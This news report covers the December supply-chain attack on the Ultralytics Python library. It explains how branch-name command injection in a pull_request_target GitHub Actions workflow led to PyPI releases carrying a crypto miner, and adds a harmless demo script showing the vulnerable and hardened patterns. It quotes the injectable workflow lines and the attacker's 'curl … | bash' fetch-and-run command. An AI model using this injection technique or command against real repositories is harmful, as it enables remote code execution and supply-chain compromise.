Attackers managed to execute code in the context of the GitHub Actions workflows of the repository of the Ultralytics Python library, which is used for computer vision tasks such as object detection and image segmentation. After gaining access to the repository, the attackers published several new Ultralytics releases on PyPI that contained malicious changes with a cryptocurrency miner. Over the past month the Ultralytics library was downloaded from PyPI more than 6.4 million times.
To compromise the repository, the attackers exploited a vulnerability in the ultralytics/actions package, which is used to run handlers automatically when certain events occur in a GitHub repository via the GitHub Actions mechanism. In the ultralytics project the vulnerable handler was bound to the pull_request_target event, which fires when a new pull request arrives. Unlike pull_request, a pull_request_target workflow runs with the base repository's write-capable GITHUB_TOKEN and its secrets even for pull requests from forks, which is what made command injection there valuable. Specifically, to format the code of incoming pull requests the format.yml workflow was invoked, and it executed the code listed in the "run" section of the action.yml file. That code consisted of shell commands containing substitution patterns:

    git pull origin ${{ github.head_ref || github.ref }}
    git config --global user.name "${{ inputs.github_username}}"
    git config --global user.email "${{ inputs.github_email}}"

In other words, the name of the Git branch referenced in the pull request was substituted into shell commands without any escaping. A "${{ ... }}" expression is expanded textually by the runner before the shell ever sees the script, so shell metacharacters in the branch name become part of the script itself. Notably, a similar weakness involving an externally controlled value passed to echo had already been fixed in the ultralytics-actions package in August:

    echo "github.event.pull_request.head.ref: ${{github.event.pull_request.head.ref}}"

To execute their code in the context of the GitHub Actions handler, the attackers sent a pull request to the ultralytics repository from a branch named: openimbot:$
Accordingly, when the pull request was received, the "$(…)" string chosen by the attackers was substituted into the script, and on the handler's next run this led to the execution of "curl -sSfL raw.githubusercontent.com/…/file.sh | bash".
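The injection described above, as an added example that is not part of the original article or of the Ultralytics project: a POSIX shell script that emulates how the runner pastes a "${{ ... }}" value into a "run:" script as text, next to the hardened form where the same value is passed through an environment variable and quoted. The branch name is constructed and its payload is harmless (it evaluates `expr 40 + 2`) in place of the curl | bash payload; `echo` stands in for `git` so the script runs without a repository.

```sh
#!/bin/sh
# Added example, not code from the article or from the Ultralytics project.
# It emulates the two ways a pull-request branch name can reach a `run:` script:
# textual ${{ }} expansion (the vulnerable pattern) and an environment variable.

# Constructed branch name in the style of the attack. The payload is harmless
# here (it evaluates `expr 40 + 2`); the real one fetched a script and piped it
# into bash.
EVIL_REF='openimbot:$(expr 40 + 2)'

# Vulnerable pattern, the equivalent of
#   run: git pull origin ${{ github.head_ref || github.ref }}
# The runner pastes the expression's value into the script text, so the shell
# later evaluates any $(...) that the branch name carries.
unsafe_pull() {
    head_ref="$1"
    script="echo git pull origin ${head_ref}"   # textual substitution, like ${{ }}
    sh -c "$script"
}

# Hardened pattern, the equivalent of
#   env:
#     HEAD_REF: ${{ github.head_ref || github.ref }}
#   run: git pull origin "$HEAD_REF"
# The value reaches the shell as data in a variable and is quoted, so it is
# never parsed as script text.
safe_pull() {
    HEAD_REF="$1" sh -c 'echo git pull origin "$HEAD_REF"'
}

# Returns 0 when the output shows that the $(...) in the ref was executed,
# i.e. the literal "$(" from the ref no longer appears on the command line.
was_injected() {
    case "$1" in
        *'$('*) return 1 ;;
        *) return 0 ;;
    esac
}

echo "unsafe: $(unsafe_pull "$EVIL_REF")"
echo "safe:   $(safe_pull "$EVIL_REF")"
```

The same fix applies to the echo line that was patched in August and to the `inputs.github_username` / `inputs.github_email` substitutions: move every attacker-influenced expression into an `env:` entry and reference it from the script as a quoted variable.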

Code running in the GitHub Actions context can be used to capture repository access tokens and other sensitive data. It is not yet clear exactly how the attackers managed to create releases once they could run their own code in GitHub Actions. They are believed to have done so by modifying the publish.yml handler (the attackers removed the check on which account is allowed to publish PyPI releases) and by using GitHub Actions build cache poisoning to inject their data into the release.
The first malicious release, Ultralytics 8.3.41, was published on PyPI by the attackers on December 4 at 23:51 (MSK) and removed at 12:15 the next day. At 15:47 another release, 8.3.42, was posted and removed at 16:47. The malicious versions were therefore available for download for about 13 hours in total (PyPI records roughly 250 thousand downloads of the ultralytics library per day). Releases 8.3.41 and 8.3.42 contained code that downloaded the XMRig cryptocurrency miner component from an external server.
The project developers resolved the issue and published fix releases 8.3.43 and 8.3.44, but two days later another attack occurred. Today at 04:41 and 05:27 (MSK) the attackers released two more malicious versions, 8.3.45 and 8.3.46, containing different miner code. Until the investigation is complete, users are advised to stop installing new versions and pin the dependency to 8.3.44.
Source: opennet.ru
